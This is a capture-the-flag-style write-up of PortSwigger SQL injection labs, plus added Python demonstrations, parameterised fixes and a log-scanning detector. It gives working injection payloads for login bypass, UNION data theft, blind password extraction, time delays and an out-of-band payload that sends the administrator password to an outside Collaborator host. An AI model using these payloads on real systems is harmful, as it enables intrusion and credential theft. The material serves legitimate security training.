
PortSwigger SQL Injection Labs

Author: Internet


SQL Injection

Principle

The root cause of an SQL injection vulnerability is that user input ends up being executed by the SQL interpreter.

Injection Types

The two main types of injection

  1. Numeric injection
  2. String injection

Classified by request method

Classified by whether the result is echoed back

Common Injection Techniques

Error-based injection

Error-based injection exploits certain database mechanisms: an error condition is deliberately created so that the query result shows up in the error message.

Boolean-based injection

The page only ever returns two kinds of response, True and False. The data is guessed one piece at a time from which of the two comes back.

UNION injection

A UNION query appended to the application's existing statement can read other content from the database; the number of output columns must match.

Time-delay injection / time-based blind injection

The page returns no error message and only ever shows one kind of response. The defining feature is the use of a sleep function to create a time delay, with the response time revealing whether the constructed condition is true.

Out-of-band injection

Out-of-band channel techniques (OOB) let an attacker confirm and exploit a vulnerability that has no direct echo through a separate channel.

With this class of vulnerability, the attacker cannot see the output of the vulnerability directly in the response to the malicious request.

OOB techniques usually use the vulnerability to generate an out-of-band TCP/UDP/ICMP request, and the attacker then extracts data through that request.

Wide-byte injection

To prevent injection, developers may escape the ' character so that it loses its effect. A ' entered at the injection point is escaped to \' which, URL-encoded, is %5c%27.

Under GBK encoding, %DF%5C happens to form the character 運, so the \ is "eaten" and the ' escapes.

Stacked injection

After ending one SQL statement with ;, keep constructing the next statement so that several statements execute in sequence.

Second-order injection

Content coming from the database is sometimes not trustworthy either.

Suppose an account is registered with the username admin'#. If the front end escapes it, the data received is admin\'#, and no SQL injection occurs at the front end.

When that user changes their password, the condition of the update statement becomes: where user='admin'#' and password='123'

The password of user admin can thus be updated without knowing it.
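The second-order scenario above, reproduced as an added example (my code, not from the post) on an in-memory SQLite database. The schema users(username, password), the seeded admin row and every password in it are constructed for the demonstration; SQLite's comment marker is -- rather than MySQL's #, so the registered name is admin'-- instead of the post's admin'#. The registration step binds its parameters correctly, and the flaw lives entirely in the password-change step that trusts the name it reads back from the database.

```python
import sqlite3


def setup_db():
    # Constructed schema and seed row; nothing here comes from the labs.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return conn


def register(conn, username, password):
    # Registration is done correctly: the quote in the name is stored literally
    # as data, never interpreted as SQL. This is the "escaping at step one".
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, username, old_password, new_password):
    # The username is read back from the database, treated as trusted, and
    # glued into the UPDATE. With the stored name admin'-- the WHERE becomes
    #   WHERE username = 'admin'--' AND password = '...'
    # so the password check is commented out and the real admin row changes.
    row = conn.execute("SELECT username FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return 0
    stored_name = row[0]
    sql = (f"UPDATE users SET password = '{new_password}' "
           f"WHERE username = '{stored_name}' AND password = '{old_password}'")
    return conn.execute(sql).rowcount  # rows actually updated


def change_password_safe(conn, username, old_password, new_password):
    # Hardened version: every value is a bound parameter, whether it came from
    # the request or from the database. A wrong old password updates nothing.
    cur = conn.execute(
        "UPDATE users SET password = ? WHERE username = ? AND password = ?",
        (new_password, username, old_password))
    return cur.rowcount


def get_password(conn, username):
    return conn.execute("SELECT password FROM users WHERE username = ?",
                        (username,)).fetchone()[0]


if __name__ == "__main__":
    conn = setup_db()
    register(conn, "admin'--", "attacker-pass")
    # The attacker "changes" their own password and supplies a wrong old one.
    print(change_password_vulnerable(conn, "admin'--", "wrong", "pwned"),
          get_password(conn, "admin"))   # -> 1 pwned  (admin overwritten)
    conn = setup_db()
    register(conn, "admin'--", "attacker-pass")
    print(change_password_safe(conn, "admin'--", "wrong", "pwned"),
          get_password(conn, "admin"))   # -> 0 S3cret!
```

The defensive lesson is the one the post states: data that was safe to store is not automatically safe to concatenate later, so the fix is parameterising every query rather than escaping at the boundary once.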

PortSwigger Labs

Lab URL

PortSwigger labs

Introduction

PortSwigger is the official site of the famous tool Burp Suite, and in practice it is also a very good vulnerability training platform; its training content is heavily oriented towards exploring each of Burp Suite's features in depth.

Lab 2: Login bypass

Lab

login-bypass

Description

This lab contains an SQL injection vulnerability in the login function.

To solve the lab, perform an SQL injection attack that logs in to the application as the `administrator` user.

Solution

Modify the username parameter, giving it the value: administrator'--

Lab 3: Determining the number of columns returned by the query

Lab

SQL injection UNION

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

To solve the lab, determine the number of columns returned by the query by performing an attack that returns an additional row containing null values.

Solution

' union select '','','' -- '

Lab 4: Finding a column containing text

Lab

find-column-containing-text

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Solution

Pets' union select NULL,'OdeAKf',NULL -- '

Lab 5: Retrieving data from other tables

Lab

retrieve-data-from-other-tables

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

Retrieve the administrator's password, then log in

' union select username,password from users where username='administrator'-- '

Lab 6: Retrieving multiple values in a single column

Lab

retrieve-multiple-values-in-single-column

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

First determine the number of columns, then find which column carries text, then query that column for the password of administrator in the users table, and log in

Pets' union select NULL,password from users where username='administrator'-- '

Official solution: use string concatenation to return the username and password together in one column

'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
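How labs 3 to 6 look from the application's side, as an added example that is not the lab's code: a SQLite stand-in for the product category filter with a made-up products table and one constructed users row. The vulnerable version shows why the column count has to match first (a one-column UNION against the two-column query raises an error, which is what the lab 3 probe observes) and why the official lab 6 payload then returns username~password as an extra row; the hardened version binds the value as a parameter and additionally checks it against an allow-list of known categories.

```python
import sqlite3


def setup_shop():
    # Constructed tables and values standing in for the lab's database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, price INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [("Cat litter", "Pets", 5), ("Dog lead", "Pets", 9),
                      ("Mug", "Gifts", 3)])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('administrator', 'hunter2')")
    return conn


def filter_vulnerable(conn, category):
    # The category is concatenated into the statement, so a value containing
    # a quote is parsed as SQL. The query returns two columns, which is why
    # only a two-column UNION SELECT can append rows to its result.
    sql = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


ALLOWED_CATEGORIES = {"Pets", "Gifts"}


def filter_safe(conn, category):
    # Two independent defences: an allow-list, because the category comes
    # from a fixed set, and a bound parameter, so the value is never parsed
    # as SQL even if the allow-list is later loosened.
    if category not in ALLOWED_CATEGORIES:
        return []
    return conn.execute(
        "SELECT name, category FROM products WHERE category = ?",
        (category,)).fetchall()


def try_filter(conn, func, category):
    # Returns ("ok", rows) or ("error", message) so the column-count mismatch
    # error behind the lab 3 probe is visible instead of raising.
    try:
        return ("ok", func(conn, category))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    conn = setup_shop()
    print(try_filter(conn, filter_vulnerable, "' union select NULL-- '"))
    # -> ('error', 'SELECTs to the left and right of UNION do not have the same number of result columns')
    leak = "' UNION SELECT NULL,username||'~'||password FROM users--"
    print(try_filter(conn, filter_vulnerable, leak))
    # -> ('ok', [(None, 'administrator~hunter2')])
    print(try_filter(conn, filter_safe, leak))
    # -> ('ok', [])
```

The error message from the mismatched UNION is exactly the kind of database error that should never reach the client; the safe version never builds the statement from the value at all, so there is nothing to leak.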

Lab 7: Querying the database type and version on Oracle

Lab

querying-database-version-oracle

Description

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Hint

On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.

There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual

Solution

The hint says that Oracle queries must include FROM; using FROM with the built-in table dual, determine that the query returns two columns

' union select 'a','b' from dual

Then query the database version

' union select banner,NULL from v$version --

Lab 8: Querying the database type and version on MySQL and Microsoft

Lab

querying-database-version-mysql-microsoft

Description

This lab contains an SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.

To solve the lab, display the database version string.

Solution

Similar to lab 7

' union select version(),'' -- 

Lab 9: Listing the database contents on non-Oracle databases

Lab

listing-database-contents-non-oracle

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

To solve the lab, log in as the administrator user.

Solution

  1. First find the injection point and determine the number of columns, then determine that the database is PostgreSQL
' union select version(),NULL --
# Returns PostgreSQL 11.15 (Debian 11.15-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

  2. Use PostgreSQL's information_schema to find table information
' union select table_name,NULL from information_schema.tables --
# Look for anything related to users; the table name is users_aawdcg

  3. Find the column information from the table name
' union select column_name,NULL from information_schema.columns where table_name='users_feertj' --
# The table has two columns, username_hcekhs and password_jrbkza

  4. Find the password from the column and table names
' union select username_hcekhs,password_jrbkza from users_feertj --
# Because there happen to be exactly two columns, select * also works directly
' union select * from users_feertj --

Lab 10: Listing the database contents on Oracle

Lab

listing-database-contents-oracle

Description

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response so you can use a UNION attack to retrieve data from other tables.

The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.

Solution

  1. Oracle requires a table name after every query; the first step is to determine the number of columns
Gifts' union select NULL,NULL from dual --

  2. Query the list of tables
' union select table_name,NULL from user_tables --

  3. Find the columns of the users table
' union select column_name,NULL from all_tab_columns where table_name='USERS_THOWFV' --

  4. Query the username and password using the columns found
' union select USERNAME_EBFGFL,PASSWORD_LPNHXW from USERS_THOWFV --

Lab 11: Blind SQL injection with conditional responses

Lab

conditional-responses

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

  1. The description points out that the injection point is the TrackingId field in the cookie and that this is a blind injection: whether the query succeeds shows up as whether the page displays "Welcome back". Test the injection point with and
AdaFLRQSl4CNI1mZ' and '1'='1
AdaFLRQSl4CNI1mZ' and '1'='0

  2. Confirm that the table name is users
AdaFLRQSl4CNI1mZ' and (select 'a' from users)='a

  3. Confirm the administrator username and determine the password length: the administrator's password is 20 characters long
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)>1)='a
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)>10)='a
...
AdaFLRQSl4CNI1mZ' and (select 'a' from users where username='administrator' and length(password)=20)='a

  4. Start guessing the password: use Burp Suite to brute-force it, guessing the 20-character password one position at a time with substring, with payloads 0-9 and a-z. The response to a correct payload is longer than the response to a wrong one; in the end the full 20-character password is obtained
AdaFLRQSl4CNI1mZ' and (select substring(password,1,1) from users where username='administrator')='0

  5. With the result, log in to the administrator account using the password; success
AdaFLRQSl4CNI1mZ' and (select password from users where username='administrator')='qgbvsw68icew39goc4n5

Lab 12: Blind SQL injection with conditional errors

Lab

conditional-errors

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

  1. Find the injection point
5jQtXyfrvRvkebz2'  # error
5jQtXyfrvRvkebz2''  # no error
5jQtXyfrvRvkebz2' and 1=1 --  # no error
5jQtXyfrvRvkebz2' and 1=0 --  # no error; so far this shows there is no error regardless of whether the query returns rows
5jQtXyfrvRvkebz2' and aaa --  # error; guess that an error is returned when the SQL itself is invalid
5jQtXyfrvRvkebz2' and (select 'a')='a' --  # error; keep trying
5jQtXyfrvRvkebz2' and (select 'a' from dual)='a' --  # no error; confirms the database is Oracle
5jQtXyfrvRvkebz2' and (select 'a' from aaaa)='a' --  # error; shows an error is returned when the database raises one (a syntax error or a table that does not exist)

  2. Confirm that the table name is users and the column names are username and password
5jQtXyfrvRvkebz2' and (select 'a' from users)='a' --  # no error, so the users table exists
5jQtXyfrvRvkebz2' and (select 'a' from users where username='' and password='')='a' --  # no error, so the table has username and password columns

  3. No error is raised whether or not the query returns rows, so an error has to be forced deliberately when the query finds nothing; use an Oracle conditional expression
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (1=1) THEN 'a' ELSE to_char(1/0) END FROM dual)='a' --  # no error
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (1=0) THEN 'a' ELSE to_char(1/0) END FROM dual)='a' --  # error

  4. Use the conditional expression to determine that the password is 20 characters long
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)>0 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)>1 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --
...
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN length(password)=20 THEN 'a' ELSE to_char(1/0) END FROM users where username='administrator')='a' --

  5. Use substr() and Burp Suite to crack it one character at a time; the correct character gives a longer response
5jQtXyfrvRvkebz2' and (SELECT CASE WHEN (select substr(password,1,1) from users where username='administrator')='0' THEN 'a' ELSE to_char(1/0) END FROM dual)='a' --  # change one position at a time

  6. Join the 20 characters together to get the administrator password

Lab 13: Blind SQL injection with time delays

Lab

time-delays

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

To solve the lab, exploit the SQL injection vulnerability to cause a 10 second delay.

Solution

'||(select pg_sleep(10))--

Lab 14: Blind SQL injection with time delays and information retrieval

Lab

time-delays-info-retrieval

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

  1. Confirm the time-based injection point
0DeLq71QXa4q6Tyr'||(select pg_sleep(10))--

  2. Add a conditional test
0DeLq71QXa4q6Tyr'||(select case when 1=1 then pg_sleep(10) else NULL end)--  # delay
0DeLq71QXa4q6Tyr'||(select case when 1=0 then pg_sleep(10) else NULL end)--  # no delay

  3. Confirm the table name and the administrator's username
0DeLq71QXa4q6Tyr'||(select case when username='administrator' then pg_sleep(10) else NULL end from users where username='administrator')--  # delay

  4. Determine the password length
0DeLq71QXa4q6Tyr'||(select case when length(password)>0 then pg_sleep(10) else NULL end from users where username='administrator')--
0DeLq71QXa4q6Tyr'||(select case when length(password)>10 then pg_sleep(10) else NULL end from users where username='administrator')--
...
0DeLq71QXa4q6Tyr'||(select case when length(password)=20 then pg_sleep(10) else NULL end from users where username='administrator')--

  5. Use Burp to brute-force each position of the password
0DeLq71QXa4q6Tyr'||(select case when substring(password,1,1)='l' then pg_sleep(10) else NULL end from users where username='administrator')--

Lab 15: Out-of-band injection

Lab

out-of-band

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the SQL injection vulnerability to cause a DNS lookup to Burp Collaborator.

Solution

Make Oracle issue a DNS request

x' UNION SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.s0tepbytd3wxf9edi6v1uq84ivoocd.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--

Lab 16: Out-of-band injection with data exfiltration

Lab

out-of-band-data-exfiltration

Description

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The SQL query is executed asynchronously and has no effect on the application's response. However, you can trigger out-of-band interactions with an external domain.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Solution

Same as lab 15

x' UNION SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.s0tepbytd3wxf9edi6v1uq84ivoocd.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual--
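Seen from the defender's side, the blind, time-based and out-of-band labs above (11 to 16) all leave the same trace: a TrackingId cookie or category parameter whose URL-decoded value contains SQL fragments. The scanner below is an added example (not from the post or from PortSwigger) that runs over constructed log lines built from the post's own payloads; the log format and the signature list are assumptions, and a line is only flagged on a strong signature so that a harmless -- inside a product name is recorded but does not raise an alert on its own.

```python
import re
from urllib.parse import unquote_plus

# Constructed log lines in an assumed "<method> <path> cookie=<cookies>" shape.
# The parameter and cookie values are the post's lab payloads, URL-encoded the
# way a browser or Burp would send them; none of this is real traffic.
SAMPLE_LOG = [
    "GET /filter?category=Pets cookie=TrackingId=AdaFLRQSl4CNI1mZ",
    "GET / cookie=TrackingId=AdaFLRQSl4CNI1mZ%27%20and%20%271%27%3D%271",
    "GET / cookie=TrackingId=5jQtXyfrvRvkebz2%27%20and%20(SELECT%20CASE%20WHEN%20(1%3D0)"
    "%20THEN%20%27a%27%20ELSE%20to_char(1/0)%20END%20FROM%20dual)%3D%27a%27%20--",
    "GET / cookie=TrackingId=0DeLq71QXa4q6Tyr%27%7C%7C(select%20pg_sleep(10))--",
    "GET /filter?category=%27+UNION+SELECT+NULL,username%7C%7C%27~%27%7C%7Cpassword"
    "+FROM+users-- cookie=TrackingId=zzz",
    "GET / cookie=TrackingId=x%27%20UNION%20SELECT%20extractvalue(xmltype(%27%3C?xml"
    "%20version%3D%221.0%22?%3E%27),%27/l%27)%20FROM%20dual--",
    "GET /filter?category=Gifts&q=hand--made cookie=TrackingId=AdaFLRQSl4CNI1mZ",
]

# Strong signatures: SQL fragments that have no business in a category name
# or a tracking id. Matched against the URL-decoded line, case-insensitively.
STRONG = [
    ("quote-and-or", re.compile(r"'\s*(and|or)\s+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("time-delay", re.compile(r"\b(pg_sleep|sleep)\s*\(", re.I)),
    ("case-when", re.compile(r"\bcase\s+when\b", re.I)),
    ("substring", re.compile(r"\bsubstr(ing)?\s*\(", re.I)),
    ("oob-xml", re.compile(r"\b(extractvalue|xmltype)\s*\(", re.I)),
]
# Weak signatures: worth recording, but common enough in ordinary text that
# they do not raise an alert by themselves.
WEAK = [
    ("sql-comment", re.compile(r"--|/\*")),
    ("single-quote", re.compile(r"'")),
]


def scan_line(line):
    # Decode first: %27 -> ', + -> space. Signatures never match the raw line.
    decoded = unquote_plus(line)
    strong = [name for name, rx in STRONG if rx.search(decoded)]
    weak = [name for name, rx in WEAK if rx.search(decoded)]
    return {"line": line, "decoded": decoded, "strong": strong,
            "weak": weak, "flagged": bool(strong)}


def scan_log(lines):
    """Return the scan results for every line carrying a strong signature."""
    return [r for r in map(scan_line, lines) if r["flagged"]]


if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(", ".join(r["strong"]), "<-", r["decoded"])
```

Decoding before matching is the important step: the cookie value in lab 11 only contains `' and '` once %27 and %20 are decoded, and the official lab 6 payload uses + for spaces, which unquote_plus handles and unquote does not. The weak tier exists so that the benign hand--made query is visible in the results without generating an alert.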

Source: https://www.cnblogs.com/zhoujinxuan/p/16242842.html